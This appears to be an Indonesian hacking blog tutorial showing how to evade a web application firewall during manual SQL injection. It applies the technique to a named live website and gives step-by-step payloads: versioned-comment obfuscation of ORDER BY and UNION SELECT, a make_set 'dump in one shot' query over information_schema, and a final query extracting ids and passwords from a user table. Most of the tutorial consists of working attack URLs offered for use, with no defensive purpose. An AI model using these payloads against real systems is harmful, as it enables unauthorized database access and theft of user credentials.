Lompat ke konten Lompat ke sidebar Lompat ke footer

Cara Bypass Waf 403 Forbidden Metode Sql Injection

Balik Lagi Bersama ane Mr.Who sepakat sakarang gw bakal ngasih tutor gmn cara Bypass WAF 403 Forbidden SQL Injection Manual. Bagi yang gk tau apa itu WAF, Waf adalah Web Application Firewall yang dipakai untuk keamanan website singkatnya. Gw anggap aja kalian dah punya sasaran atau kalian dapat pakek live target
nih : http://www.gilabet88.org/detailnews.php?id=810
Yok pribadi saja ke tutorial nya.


1. Setelah kalian cek apakah web tersebut vuln terhadap SQL Injection, kalian masukkan order by untuk mengetahui jumlah kolom web itu. Pada dikala gw masukin perintah order by, muncul lah pesan kayak di gambar dibawah. http://www.gilabet88.org/detailnews.php?id=810%27+order+by+1--+



2. Kode untuk membypass nya ialah :
/*50000...*/+/*50000...*/
/*12345...*/+/*12345...*/
Kalian cukup tambahkan ke perintah Order by nya. Kalo kurang terperinci dapat lihat gambar. Dan bum terbypass. http://www.gilabet88.org/detailnews.php?id=810%27+/*!50000order*/+/*!50000by*/+1--+


3. Setelah gw order, ternyata cuman sampek 10.http://www.gilabet88.org/detailnews.php?id=810%27+/*!50000order*/+/*!50000by*/+11--+


4. Skarang ganti order by nya menjadi union select jangan lupa tambahin tanda . setelah id=
Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10--+
Setelah itu muncul lah angka togel nya :v


5. Skarang kita dios buat ngelihat database nya. Masukin make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) menggantikan angka 2 tdi. Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6,7,8,9,10--+ dan ternyata Forbidden lagi.


6. Tadikan gw sudah membypass order by sama union select nya. Nah skarang gw coba bypass dios nya. /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@)
Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@),3,4,5,6,7,8,9,10--+ Dan bum dapat lagi :v


7. Skarang kita cari user sama pass nya. Ganti instruksi dios tdi dengan kode
Contoh : /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000tb_user*/)where@:=make_set(511,@,0x3c6c693e,/*!50000id*/,/*!50000password*/)),@)

Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000tb_user*/)where@:=make_set(511,@,0x3c6c693e,/*!50000id*/,/*!50000password*/)),@),3,4,5,6,7,8,9,10--+

Nah keliatan kan username sama password nya :v


Oke Sekian Dan Terima Kasih Dan Jangan Lupa Subscribe Chennel Youtube Anee Gan ada tutorial menarik buat kalian dan kalian juga dapat request tutorial apa yang perlu anda ketahui jangan lupa susbcribe and share : rzqmlnID
Sumber https://mrwho-404.blogspot.com/